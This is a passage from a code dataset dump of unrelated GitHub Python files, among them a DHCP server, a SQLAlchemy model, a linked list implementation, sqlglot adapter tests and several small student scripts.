__init__(cls, name, bases, *args, **kwargs):\n type.__init__(cls, name, bases, *args, **kwargs)\n cls.__new__ = staticmethod(cls.new)\n \n ancestors = list(cls.__mro__)\n ancestors.reverse() # Start with __builtin__.object\n abstractmethods = []\n for ancestor in ancestors:\n for clsname, clst in ancestor.__dict__.items():\n if isinstance(clst, AbstractMethod):\n abstractmethods.append(clsname)\n else:\n if clsname in abstractmethods:\n abstractmethods.remove(clsname)\n\n abstractmethods.sort()\n setattr(cls, '__abstractmethods__', abstractmethods)\n\n def new(self, cls):\n if len(cls.__abstractmethods__):\n raise NotImplementedError('Can\\'t instantiate class `' + \\\n cls.__name__ + '\\';\\n' + \\\n 'Abstract methods: ' + \\\n \", \".join(cls.__abstractmethods__))\n \n return object.__new__(self)\n","repo_name":"BackupTheBerlios/futil-svn","sub_path":"trunk/src/futil/utils/abstract.py","file_name":"abstract.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1011253750","text":"import json\nimport sys\n\ndef loadFile():\n try:\n f = open('workfile', 'r')\n except FileNotFoundError:\n f = open('workfile', 'w')\n f.close()\n f = open('workfile', 'r')\n return f\ndef loadList():\n try:\n ideas = json.load(f)\n except json.decoder.JSONDecodeError:\n ideas = []\n return ideas\n\ndef addIdea(ideaList):\n idea = input(\"What is your new idea: \")\n ideaList.append(idea)\ndef printIdeas(ideaList):\n print()\n print(\"Your ideabank:\")\n for i in range(len(ideaList)):\n print(str(i+1)+\". \"+ideaList[i])\ndef saveIdeas(ideaList, ideaFile):\n ideaFile.close()\n ideaFile = open('workfile', 'w')\n json.dump(ideaList, ideaFile)\n\ndef main():\n f = loadFile()\n ideas = loadList()\n\n if len(sys.argv) == 1:\n addIdea(ideas)\n printIdeas(ideas)\n saveIdeas(ideas, f)\n else:\n if sys.argv[1] == \"--list\":\n printIdeas(ideas)\n elif sys.argv[1] == \"--delete\":\n ideas.pop(int(sys.argv[2])-1)\n printIdeas(ideas)\n saveIdeas(ideas, f)\n\n f.close()\n\nmain()","repo_name":"mwagrodzki/codecool_dojos","sub_path":"ideabank.py","file_name":"ideabank.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30031482087","text":"from enum import Enum\r\n\r\n\"\"\"\r\nFixed-Income US ETFs\r\nBIL: Short-term US Treasury bills ETF\r\nSHY: 1-3 year US Treasury bonds ETF\r\nIEI: 3-7 year US Treasury bonds ETF\r\nIEF: 7-10 year US Treasury bonds ETF\r\nTLT: 20+ YR US Treasury bonds ETF\r\nMBB: iShares MBS ETF\r\nLQD: iShares iBoxx Investment Grade Corporate Bond ETF\r\nHYG: iShares iBoxx High Yield Corporate Bond ETF\r\nJNK: SPDR Bloomberg Barclays High Yield Bond ETF\r\nPCY: Invesco Emerging Markets Sovereign Debt ETF\r\nBOND: PIMCO Total Return Bond ETF\r\n\r\nEQ EMERGING MARKETS ETFS\r\nFXI: iShares China Large-Cap ETF\r\nKWEB: KraneShares CSI China Internet ETF\r\nEWZ: iShares MSCI Brazil ETF\r\nEWW: iShares MSCI Mexico ETF\r\nEWS: iShares MSCI Singapore ETF\r\nEWY: iShares MSCI South Korea ETF\r\nEWT: iShares MSCI Taiwan ETF\r\nINDA: iShares MSCI India ETF\r\nEWH: iShares MSCI Hong Kong ETF\r\nEZA: iShares MSCI South Africa ETF\r\n\r\nEQ DEVELOPED COUNTRIES ETFS\r\nEWA: iShares MSCI Australia ETF\r\nEWC: iShares MSCI Canada ETF\r\nEWQ: iShares MSCI France ETF\r\nEWG: iShares MSCI Germany ETF\r\nEWI: iShares MSCI Italy ETF\r\nEWJ: iShares MSCI Japan ETF\r\nEWP: iShares MSCI Spain ETF\r\nEWU: iShares MSCI United Kingdom ETF\r\nEUFN: iShares MSCI Europe Financials ETF\r\nEWL: iShares MSCI Switzerland ETF\r\n\r\nEQ US SECTORS ETFS\r\nXLY: Consumer Discretionary ETF\r\nXLP: Consumer Staples ETF\r\nXLE: Energy ETF\r\nXLF: Financials ETF\r\nXLV: Healthcare ETF\r\nXLI: Industrial ETF\r\nXLB: Materials ETF\r\nXLK: Technology ETF\r\nXBI: Biotech ETF\r\nSMH: Semiconductor ETF\r\nXLC: Communication Services ETF\r\nXLU: Utilities ETF\r\nXME: Metals & Mining ETF\r\nGDX: Gold Miners ETF\r\nXOP: Oil & Gas Exploration & Production ETF\r\nXHB: Homebuilders ETF\r\nXLRE: Real Estate ETF\r\nXRT: Retail ETF\r\n\r\nEQ INDICES ETFS\r\nSPY: S&P 500 ETF\r\nQQQ: Nasdaq-100 ETF\r\nDIA: Dow Jones Industrial Average ETF\r\nIWM: Russell 2000 ETF\r\n\r\nFixed-Income Futures (100K$ face value traded on CBOT)\r\nZT1: 2-3 year Treasury note futures\r\nZF1: 4.5-5.5 year Treasury bond futures\r\nZN1: 9-10 year Treasury note futures\r\nZB1: 15-25 year Treasury bond futures\r\n\r\nPrecious Metals futures\r\nGC1: Gold futures contract traded on the Tokyo Commodity Exchange (Tocom).\r\nSI1: Silver futures contract traded on the Tocom.\r\nPL1: Platinum futures contract traded on the Tocom.\r\nPA1: Palladium futures contract traded on the Tocom.\r\n\r\nEnergy futures\r\nCL1: Crude oil futures contract traded on the New York Mercantile\r\nExchange (NYMEX).\r\nNG1: Natural gas futures contract traded on the NYMEX.\r\nHO1: Heating oil futures contract traded on the NYMEX.\r\nBZ1: Brent crude oil futures contract traded on the Intercontinental\r\nExchange (ICE).\r\nRB1: RBOB gasoline futures contract traded on the NYMEX.\r\n\r\nUS EQ IDX FUTURES\r\nES1: E-mini S&P 500 futures contract traded on the Chicago Mercantile\r\nExchange (CME).\r\nYM1: E-mini Dow Jones Industrial Average futures contract traded on the CME.\r\nNQ1: E-mini Nasdaq 100 futures contract traded on the CME.\r\nRTY1: E-mini Russell 2000 futures contract traded on the CME.\r\n\r\n\"\"\"\r\n\r\n\r\nclass Universe(Enum):\r\n US_EQ_SECTOR = (\r\n \"us_eq_sector\",\r\n \"ETF\",\r\n \"XLY.XLP.XLE.XLF.XLV.XLI.XLB.XLK.XBI.SMH.XLC.XLU.XME.GDX.XOP.XHB.XLRE.XRT\",\r\n )\r\n US_EQ_INDEX = (\"us_eq_index\", \"ETF\", \"SPY.QQQ.DIA.IWM\")\r\n EQ_DEV_COUNTRY = (\r\n \"eq_dev_country\",\r\n \"ETF\",\r\n \"EWA.EWC.EWQ.EWG.EWI.EWJ.EWP.EWU.EUFN.EWL\",\r\n )\r\n EQ_EM_COUNTRY = (\r\n \"eq_em_country\",\r\n \"ETF\",\r\n \"FXI.KWEB.EWZ.EWW.EWS.EWY.EWT.INDA.EWH.EZA\",\r\n )\r\n US_FI_ETF = (\r\n \"us_fi_etf\",\r\n \"ETF\",\r\n \"BIL.SHY.IEI.IEF.TLT.MBB.LQD.HYG.JNK.PCY.BOND\",\r\n )\r\n COMMO_ETF = (\"commo_etf\", \"ETF\", \"GLD.SLV.USO.UNG.DBA.DBC\")\r\n US_EQ_IDX_FUT = (\"us_eq_idx_fut\", \"FUT\", \"ES1.YM1.NQ1.RTY1\")\r\n FI_FUT = (\"fi_fut\", \"FUT\", \"ZT1.ZF1.ZN1.ZB1\")\r\n PM_FUT = (\"pm_fut\", \"FUT\", \"GC1.SI1.PL1.PA1\")\r\n ENERGY_FUT = (\"energy_fut\", \"FUT\", \"CL1.NG1.HO1.BZ1.RB1\")\r\n FX_MAJOR_PAIRS = (\r\n \"fx_major_pairs\",\r\n \"FX\",\r\n \"EURUSD.USDJPY.GBPUSD.AUDUSD.USDCAD.USDCHF.NZDUSD.USDMXN\",\r\n )\r\n","repo_name":"lolay92/data-service","sub_path":"src/data_services/utils/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33709134419","text":"import json\r\nimport requests\r\nimport csv\r\n\r\nwith open('migration.json') as migration:\r\n data = json.load(migration)\r\n\r\nrequest = f\"https://{data['serv']}:{data['gate']}\"\r\nresponse = requests.get(request)\r\n\r\nkind = response[data['kind']]\r\n\r\nrows = []\r\n\r\nfor d in kind:\r\n have = False\r\n if d['size'] >= data['min_size']:\r\n for i in range(len(rows)):\r\n if d['place'] == rows[i]['place'] and d['size'] == rows[i]['size']:\r\n rows[i]['total'] += d['amount']\r\n have = True\r\n if not have:\r\n rows. append({\r\n 'place': d['place'],\r\n 'size': d['size'],\r\n 'total': d['amount']\r\n })\r\n\r\nrows.sort(key=lambda x: (-x['total'], x['place']))\r\n\r\nwith open('butterflies.csv', 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile, delimiter='*')\r\n writer.writerow(['place', 'size', 'total'])\r\n for i in rows:\r\n writer.writerow([i['place'], i['size'], i['total']])\r\n","repo_name":"AidarKa05/sr","sub_path":"SRp 2.py","file_name":"SRp 2.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20842008997","text":"import os\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy.types import Integer, String, Boolean, Text, DateTime\nfrom sqlalchemy.pool import StaticPool\n\nfrom datetime import datetime\n\n\n__all__ = [\n \"Model\",\n \"Account\",\n \"Question\",\n ]\n\n\nclass Model:\n meta = None # Table 集合, 只是 Initial\n engine = None # 存放連結 Database 的資訊, 只是 Initial\n conn = None # 與 Database 的連結, 透過這個下 SQL 指令, 只是 Initial\n\n @classmethod\n def start_engine(cls, db_uri=None):\n \"\"\"Intial Database 連結的資訊\"\"\"\n\n if db_uri is None or db_uri == \"sqlite:///:memory:\":\n cls.engine = create_engine(\n \"sqlite:///:memory:\",\n connect_args={'check_same_thread': False},\n poolclass=StaticPool,\n )\n else:\n cls.engine = create_engine(db_uri)\n\n @classmethod\n def initial_meta(cls):\n cls.meta = MetaData() # 紀錄 Database 有什麼\n\n Account.register(cls.meta) # 把 Account 註冊到 Meta\n Question.register(cls.meta) # 把 Question 註冊到 Meta\n\n cls.meta.create_all(cls.engine)\n \n @classmethod\n def connect(cls):\n \"\"\"開始與 Database 的連結\"\"\"\n\n cls.conn = cls.engine.connect()\n return cls.conn\n \n @classmethod\n def disconnect(cls):\n \"\"\"結束語 Database 的連結\"\"\"\n\n if cls.conn is not None:\n cls.conn.close()\n cls.conn = None\n\n\nclass Account:\n NAME = \"tb-account\" # Table 名字\n T = None # Table instance\n\n @classmethod\n def register(cls, meta):\n cls.T = Table(\n cls.NAME,\n meta,\n Column(\"id\", Integer, primary_key=True, autoincrement=True),\n Column(\"login_id\", String, nullable=False, autoincrement=False,\n unique=True), # NOT NULL\n Column(\"password\", String, nullable=False, autoincrement=False),\n Column(\"create_at\", DateTime, default=datetime.utcnow,\n autoincrement=True),\n )\n\n\nclass Question:\n NAME = \"tb-question\"\n T = None\n\n @classmethod\n def register(cls, meta):\n cls.T = Table(\n cls.NAME,\n meta,\n Column(\"id\", Integer, primary_key=True, autoincrement=True),\n Column(\"title\", String, nullable=False, autoincrement=False),\n Column(\"content\", Text, nullable=False, autoincrement=False),\n Column(\"writer\", String, nullable=False, autoincrement=False), # 不是 FK\n # Column(\"writer\", Integer, ForeignKey(\"tb-account.id\")),\n Column(\"create_at\", DateTime, default=datetime.now,\n autoincrement=True),\n )\n\n\nif __name__ == \"__main__\":\n Model.start_engine(\"sqlite:///test.db\")\n Model.initial_meta()\n\n if os.path.isfile(\"test.db\"):\n os.remove(\"test.db\")\n","repo_name":"panmpan17/Kangaroo","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29155693475","text":"#\n# >>> Escriba el codigo del reducer a partir de este punto <<<\n#\n\n#### !/usr/bin/env python\n\nimport sys\n\nfor line in sys.stdin:\n line = line.strip()\n value, key = line.split(',')\n print(f'{key},{value}')\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-Dannyqp98","sub_path":"pregunta_03/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1231258149","text":"#학번 : 202104367\n#학과 : 컴퓨터공학과\n#이름 : 전상인\n# Node 클래스 정의\nclass Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\n\n# LinkedList 클래스 정의\nclass LinkedList:\n\n\t# 초기화 메소드\n\tdef __init__(self):\n\t\tdummy = Node(\"dummy\")\n\t\tself.head = dummy\n\t\tself.tail = dummy\n\n\t\tself.current = None\n\t\tself.before = None\n\n\t\tself.num_of_data = 0\n\n\t# append 메소드 (insert - 맨 뒤에 노드 추가, tail과 node의 next, 데이터 개수 변경)\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\t\tself.tail.next = new_node\n\t\tself.tail = new_node\n\n\t\tself.num_of_data += 1\n\n\t# delete 메소드 (delete - current 노드 삭제, 인접 노드의 current, next 변경, 데이터 개수 변경)\n\tdef delete(self):\n\t\tpop_data = self.current.data\n\n\t\tif self.current is self.tail:\n\t\t\tself.tail = self.before\n\t\n\t\tself.before.next = self.current.next\n\t\t# 중요 : current가 next가 아닌 before로 변경된다.\n\t\tself.current = self.before \n\n\t\tself.num_of_data -= 1\n\n\t\treturn pop_data\n\n\t# first 메소드 (search1 - 맨 앞의 노드 검색, before, current 변경)\n\tdef first(self):\n\t\t# 데이터가 없는 경우 첫번째 노드도 없기 때문에 None 리턴\n\t\tif self.num_of_data == 0: \n\t\t\treturn None\n\n\t\tself.before = self.head\n\t\tself.current = self.head.next\n\n\t\treturn self.current.data\n\n\t# next 메소드 (search2 - current 노드의 다음 노드 검색, 이전에 first 메소드가 한번은 실행되어야 함)\n\tdef next(self):\n\t\tif self.current.next == None:\n\t\t\treturn None\n\n\t\tself.before = self.current\n\t\tself.current = self.current.next\n\n\t\treturn self.current.data\n\n\t# size 메소드\n\tdef size(self):\n\t\treturn self.num_of_data \n\t\n\tdef traverse_all(self):\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListT\")\n\t\t\treturn None\n\t\t\n\t\tself.first()\n\t\n\t\tprint('head',end='')\n\t\twhile self.current.next!= None: #조건을 self.current로 해놓으면 self.first() 함수가 current의 다음이 None일때 current와 before의 위치를 옮기지 않으므로 무한루프에 걸린다\n\t\t\tprint(f'-> {self.current.data} ',end='')\n\t\t\tself.next()\n\n\t\t#self.first() 함수가 current의 다음이 None일때 current와 before의 위치를 옮기지 않으므로 마지막 원소만 따로 처리해준다.\n\t\tprint(f'-> {self.current.data} -> null')\n\n\t\n\n\tdef insert_at(self, position, new_data):\n\t\tcount = 1\n\t\tnew_node = Node(new_data)\n\t\tself.first()\n\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListI\")\n\t\t\treturn None\n\t\t\n\t\tif position <= 0:\n\t\t\tprint(\"Position Input Error\")\n\t\t\treturn None\n\t\t\n\t\tif position > self.num_of_data :\n\t\t\tself.append(new_data)\n\t\t\tprint(\"Exceed Position. Append Data\")\n\n\t\telse:\n\t\t\twhile count != position:\n\t\t\t\tcount +=1\n\t\t\t\tself.next()\n\t\t\t\n\t\t\tself.before.next = new_node\n\t\t\tnew_node.next = self.current\n\t\t\tself.num_of_data +=1\n\n\n\t\t\n\tdef remove(self, key):\n\t\tself.first()\n\t\tpos = 1\n\t\tbefore_delete = self.num_of_data\n\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListR\")\n\t\t\treturn None\n\t\t\t\n\t\twhile self.current.next != None:\n\t\t\tif key == self.current.data:\n\t\t\t\tself.delete()\n\t\t\t\tprint(f\"{pos}번째 데이터를 삭제합니다.\")\n\n\t\t\tself.next()\n\t\t\tpos += 1\n\t\tif self.current.data == key:\n\t\t\tself.delete()\n\t\t\tprint(f\"{pos}번째 데이터를 삭제합니다.\")\n\t\t\n\t\tif before_delete == self.num_of_data:\n\t\t\tprint(\"해당하는 원소가 없습니다.\")","repo_name":"gsi1324/DSJupyter","sub_path":"myssl.py","file_name":"myssl.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2583378581","text":"import os\nimport numpy as np\nfrom torch.utils.data import Dataset\nimport torchaudio\nimport random\n\nclass LJSpeechDataset(Dataset):\n def __init__(self, df):\n self.dir = \"LJSpeech-1.1/wavs\"\n self.paths = df.index.values\n\n def __len__(self):\n return len(self.paths)\n\n def __getitem__(self, index):\n path = os.path.join(self.dir, f'{self.paths[index]}.wav')\n wav, sr = torchaudio.load(path)\n wav = wav.squeeze()\n if wav.shape[0] <= 20000:\n pad_wav = torch.full((20000, ), fill_value=0.0)\n pad_wav[:wav.shape[1]] = wav[:wav.shape[1]]\n output_wav = pad_wav\n else:\n rand_pos = random.randint(0, wav.shape[0] - 20000)\n output_wav = wav[rand_pos:rand_pos + 20000]\n return output_wav\n","repo_name":"VladaTrus/dla_hw_5","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7394306330","text":"import configparser\nimport misc\nimport sys\nimport db\nfrom resolver import DHCPDeclineResolver, DHCPDiscoverResolver, \\\n DHCPInformResolver, DHCPReleaseResolver, \\\n DHCPReleaseResolver, DHCPRequestResolver\nfrom socket import socket, AF_INET, SOCK_DGRAM, SOL_SOCKET, SO_REUSEADDR, \\\n SO_REUSEPORT, SOL_IP, IP_MULTICAST_TTL, IP_MULTICAST_LOOP, \\\n IP_MULTICAST_IF, inet_aton, SHUT_RD, gethostbyname, gethostname, \\\n SO_BROADCAST\n\nclass DHCPServer:\n def __init__(self):\n self.log = misc.getLogger(__class__.__name__)\n self.log.info('Starting DHCP server initialization...')\n self.config = configparser.ConfigParser()\n self.config.read('config.ini')\n if not self.config.sections():\n self.log.critical('Configuration file not found or its invalid. ' \\\n 'Please provide correct config.ini file.')\n sys.exit(-1)\n self.log.info('Configuration loaded successfully')\n self.process = True\n self.db = db.InMemoryDHCPDatabase()\n self._setup()\n\n def _setup(self):\n self.socket = socket(AF_INET, SOCK_DGRAM)\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)\n self.socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\n self.socket.setsockopt(SOL_IP, IP_MULTICAST_TTL, 20)\n self.socket.setsockopt(SOL_IP, IP_MULTICAST_LOOP, 1)\n \n def _dispatch(self, data, addr):\n pack = misc.getGeneralPacket(data)\n resolver = {}\n print(pack)\n if pack['options']['messageType'] == 'DISCOVER':\n self.log.info('Processing DISCOVER message.')\n resolver = DHCPDiscoverResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'REQUEST':\n self.log.info('Processing REQUEST message.')\n resolver = DHCPRequestResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'DECLINE':\n self.log.info('Processing DECLINE message.')\n resolver = DHCPDeclineResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'RELEASE':\n self.log.info('Processing RELEASE message.')\n resolver = DHCPReleaseResolver(pack, self.config, self.db)\n resolver.resolve()\n return\n elif pack['options']['messageType'] == 'INFORM':\n self.log.info('Processing INFORM message.')\n resolver = DHCPInformResolver(pack, self.config, self.db)\n resolver.resolve()\n self._sendPacket(resolver.toBytes(), addr)\n \n def _sendPacket(self, data, addr):\n sendsock = socket(AF_INET, SOCK_DGRAM)\n sendsock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\n sendsock.bind((self.config['zone']['server'], 0))\n sendsock.sendto(data, ('', 68))\n sendsock.close()\n\n def listen(self):\n self.socket.bind(('', 67))\n self.log.info('Sever started. Waiting for connections...')\n while self.process:\n data, client_addr = self.socket.recvfrom(1024)\n self.log.info(\"Received broadcast message on port 67\")\n self._dispatch(data, client_addr)\n self.socket.close()\n\n def shutdown(self):\n self.log.info(\"Gracefully stopping listening...\")\n try:\n self.socket.shutdown(SHUT_RD)\n except OSError:\n pass\n self.log.info(\"Server stopped.\")\n\nif __name__ == '__main__':\n print('This file is not intended to run separately. Run main.py file instead.')\n","repo_name":"Norbitor/ndhcp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34416695885","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport hydrogeosines as hgs\n\n#%% test the model\ntest = hgs.site('TEST', geoloc=[141.762065, -31.065781, 160])\n\n#%%\nhello = test.import_csv('test_data/fowlers_gap/acworth_short.csv', dt_fmt='%d/%m/%Y %H:%M')\nprint(hello)\n\n#%%\ncorrected = test.correct(et_method='hals', et=True)\nprint(corrected)\n\n#%%\nhello1 = test.calc_BE(method='acworth')\nprint(hello1)\n\n#%%\nhello1 = test.calc_BE(method='rau')\nprint(hello1)\n\n#%%\ntest.export_results('corrected.csv')\n\nanalysis\ndata\nprocessing\n\n\nsite.analysis.calc_BE()\nsite.data","repo_name":"HydroGeoSines/HydroGeoSines","sub_path":"tests/test_correct_v1.py","file_name":"test_correct_v1.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"5610873986","text":"from common import Proxy\nimport cv2\nimport os\nimport io\nfrom PIL import Image\n\nPATH = \"/mnt/data/\"\nclass CollectCache(object):\n def __init__(self, *args, **kwargs):\n self.initialize()\n super(CollectCache, self).__init__(*args, **kwargs)\n\n def initialize(self):\n if not os.path.exists(PATH + \"dataset/images\"):\n os.makedirs(PATH + \"dataset/images\")\n os.makedirs(PATH + \"dataset/depths\")\n self.lastIndex = len([name for name in os.listdir(PATH + 'dataset/images') if os.path.isfile(os.path.join(PATH + 'dataset/images', name))])\n\n\n def collect_observation(self, observation, position, rotation):\n index = self.lastIndex + 1\n\n Image.fromarray(observation[0]).save(PATH + \"dataset/images/%s.png\" % index)\n Image.fromarray(observation[1]).save(PATH + \"dataset/depths/%s.png\" % index)\n with open(PATH + \"dataset/info.txt\", \"a+\") as f:\n f.write(u\"%s %s %s %s %s %s %s %s %s %s\\n\" % ((index,) + (position[0], position[1], rotation,) + (observation[2][0], observation[2][1], observation[3][2]) + observation[4]))\n f.flush()\n self.lastIndex = index\n pass\n\ncache = CollectCache()\n\ndef make_file_dataset(navigator):\n oldCollect = navigator.collect\n def collect(observation, position, rotation, *args, **kwargs):\n oldCollect(observation, position, rotation, *args, **kwargs)\n cache.collect_observation(observation, position, rotation)\n navigator.collect = collect\n return navigator\n\n # class NavigatorProxy(Proxy):\n # def __init__(self, *args, **kwargs):\n # super(NavigatorProxy, self).__init__(*args, **kwargs)\n\n # def __getattribute__(self, name):\n # if name == \"collect\":\n # return collect\n # return super(NavigatorProxy, self).__getattribute__(name)\n \n # return NavigatorProxy(navigator)\n ","repo_name":"jkulhanek/robot-visual-navigation","sub_path":"ros/src/map_collector/src/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"14165891812","text":"import torch\nimport torch.distributed as dist\nimport argparse\nimport utils\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Distributed training')\n # parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--world_size', type=int, default=1)\n parser.add_argument('--backend', type=str, default='nccl')\n parser.add_argument(\"--dist-url\", type=str, default=\"env://\")\n parser.add_argument(\"--sync-bn\", action=\"store_true\")\n \n return parser.parse_args()\n\n\ndef main():\n args = get_args_parser()\n utils.init_distributed_mode(args, disable_print=False)\n \n rank = utils.get_rank()\n torch.manual_seed(rank + 123)\n t = torch.randint(0, 10, (2,3)).to(\"cuda\")\n print(f\"Rank {rank} has tensor {t}\")\n print(\"---------------------------------------------------\")\n \n # t = utils.reduce_across_processes(t)\n dist.all_reduce(t, op=dist.ReduceOp.SUM)\n print(f\"Rank {rank} has reduced tensor {t}\")\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mr-Philo/Torch_Distributed","sub_path":"2-DataParallel/test_all_reduce.py","file_name":"test_all_reduce.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12031648441","text":"from typing import cast\n\nimport pytest\nfrom sqlglot import parse_one, select\nfrom sqlglot.expressions import Select\n\nfrom featurebyte.enum import DBVarType, SourceType\nfrom featurebyte.query_graph.node.schema import TableDetails\nfrom featurebyte.query_graph.sql.adapter import SnowflakeAdapter, SparkAdapter, get_sql_adapter\n\n\n@pytest.mark.parametrize(\n \"dtype, expected\",\n [\n (DBVarType.FLOAT, \"FLOAT\"),\n (DBVarType.INT, \"FLOAT\"),\n (DBVarType.VARCHAR, \"VARCHAR\"),\n (DBVarType.OBJECT, \"OBJECT\"),\n (DBVarType.BINARY, \"VARIANT\"),\n (DBVarType.ARRAY, \"ARRAY\"),\n ],\n)\ndef test_get_online_store_type_from_dtype(dtype, expected):\n \"\"\"\n Test get_online_store_type_from_dtype for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.get_physical_type_from_dtype(dtype) == expected\n\n\n@pytest.mark.parametrize(\n \"query, expected\",\n [\n (\"SELECT abc as A\", \"SELECT abc as A\"),\n (\"SELECT 'abc' as A\", \"SELECT ''abc'' as A\"),\n (\"SELECT ''abc'' as A\", \"SELECT ''abc'' as A\"),\n ],\n)\ndef test_escape_quote_char__snowflake(query, expected):\n \"\"\"\n Test escape_quote_char for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.escape_quote_char(query) == expected\n\n\n@pytest.mark.parametrize(\n \"query, expected\",\n [\n (\"SELECT abc as A\", \"SELECT abc as A\"),\n (\"SELECT 'abc' as A\", \"SELECT \\\\'abc\\\\' as A\"),\n (\"SELECT \\\\'abc\\\\' as A\", \"SELECT \\\\'abc\\\\' as A\"),\n ],\n)\ndef test_escape_quote_char__spark(query, expected):\n \"\"\"\n Test escape_quote_char for SparkAdapter\n \"\"\"\n assert SparkAdapter.escape_quote_char(query) == expected\n\n\n@pytest.mark.parametrize(\n \"source_type, expected\",\n [\n (\n SourceType.SNOWFLAKE,\n 'CREATE TABLE \"db1\".\"schema1\".\"table1\" AS SELECT * FROM A',\n ),\n (\n SourceType.SPARK,\n \"CREATE TABLE `db1`.`schema1`.`table1` USING DELTA TBLPROPERTIES ('delta.columnMapping.mode'='name', 'delta.minReaderVersion'='2', 'delta.minWriterVersion'='5') AS SELECT * FROM A\",\n ),\n (\n SourceType.DATABRICKS,\n \"CREATE TABLE `db1`.`schema1`.`table1` USING DELTA TBLPROPERTIES ('delta.columnMapping.mode'='name', 'delta.minReaderVersion'='2', 'delta.minWriterVersion'='5') AS SELECT * FROM A\",\n ),\n ],\n)\ndef test_create_table_as(source_type, expected):\n \"\"\"\n Test create_table_as for Adapter\n \"\"\"\n\n table_details = TableDetails(\n database_name=\"db1\",\n schema_name=\"schema1\",\n table_name=\"table1\",\n )\n expr = parse_one(\"SELECT * FROM A\")\n new_expr = get_sql_adapter(source_type).create_table_as(table_details, cast(Select, expr))\n assert new_expr.sql(dialect=source_type).strip() == expected\n\n\n@pytest.mark.parametrize(\n \"column_name, will_be_quoted\",\n [\n (\"CUSTOMER_ID\", False),\n (\"CUSTOMER_ID_123\", False),\n (\"_CUSTOMER_ID\", False),\n (\"_CUSTOMER$ID\", False),\n (\"1CUSTOMER$ID\", True),\n (\"$CUSTOMER_ID\", True),\n (\"customerID\", True),\n (\"123\", True),\n ],\n)\ndef test_will_pivoted_column_name_be_quoted(column_name, will_be_quoted):\n \"\"\"\n Test will_pivoted_column_name_be_quoted for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.will_pivoted_column_name_be_quoted(column_name) is will_be_quoted\n\n\n@pytest.mark.parametrize(\n \"percent, expected_format\",\n [\n (10.01, \"10.01\"),\n (10.0, \"10\"),\n (10, \"10\"),\n (0.1, \"0.1\"),\n (0.000001, \"0.000001\"),\n (0.000000001, \"0.000000001\"),\n ],\n)\ndef test_tablesample_percentage_formatting(percent, expected_format):\n \"\"\"\n Test the percentage in TABLESAMPLE is not formatted using scientific notation because that is\n not supported in some engines like Spark\n \"\"\"\n out = SnowflakeAdapter.tablesample(select(\"*\").from_(\"A\"), percent).sql()\n expected = f\"SELECT * FROM (SELECT * FROM A) TABLESAMPLE({expected_format})\"\n assert out == expected\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/query_graph/test_adapter.py","file_name":"test_adapter.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"21076768057","text":"# Если в функцию передаётся кортеж, то посчитать длину всех его слов.\r\n# Если список, то посчитать кол-во букв и чисел в нём.\r\n# Число – кол-во нечётных цифр.\r\n# Строка – кол-во букв.\r\n# Сделать проверку со всеми этими случаями.\r\n\r\ndef identify(xxx):\r\n# если тип объекта кортеж - считаем длинну всех слов\r\n if isinstance(xxx, tuple):\r\n n = 0 # длинна всех слов\r\n for i in xxx:\r\n s 